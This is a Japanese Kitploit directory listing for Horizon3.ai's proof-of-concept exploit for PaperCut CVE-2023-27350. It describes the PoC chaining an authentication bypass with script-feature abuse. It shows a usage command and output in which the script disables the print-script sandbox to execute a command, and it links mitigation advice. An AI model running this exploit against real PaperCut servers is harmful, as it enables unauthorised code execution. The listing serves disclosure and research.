Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-27350 — PaperCut CVE-2023-27350 の概念実証エクスプロイト | Kitploit
ツール/GitHubGitHub/horizon3ai/cve-2023-27350
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証学習と教育
GitHubhorizon3ai/cve-2023-27350

CVE-2023-27350

PaperCut CVE-2023-27350 の概念実証エクスプロイト

リポジトリを見る
55243年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-27350

PaperCut MF/NGに影響するCVE-2023-27350のPoC

技術的分析

脆弱性の根本原因分析、侵害指標、インターネット露出については、当社のブログをご覧ください: https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise

概要

このPoCは、認証バイパスの脆弱性と組み込みスクリプト機能の悪用を連鎖させてコードを実行します。

使用法

root@kitploit:~
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

緩和策

最新バージョンに更新するか、PaperCutセキュリティアドバイザリ内の指示に従って緩和してください。

  • https://www.papercut.com/kb/Main/PO-1216-and-PO-1219

最新のセキュリティ研究については、TwitterでHorizon3.ai Attack Teamをフォローしてください:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

免責事項

このソフトウェアは、純粋に学術研究と効果的な防御技術の開発を目的として作成されており、明示的に許可された場合を除き、システムへの攻撃に使用することを意図していません。プロジェクトメンテナは、ソフトウェアの誤用について責任を負いません。責任を持って使用してください。

ツールをダウンロード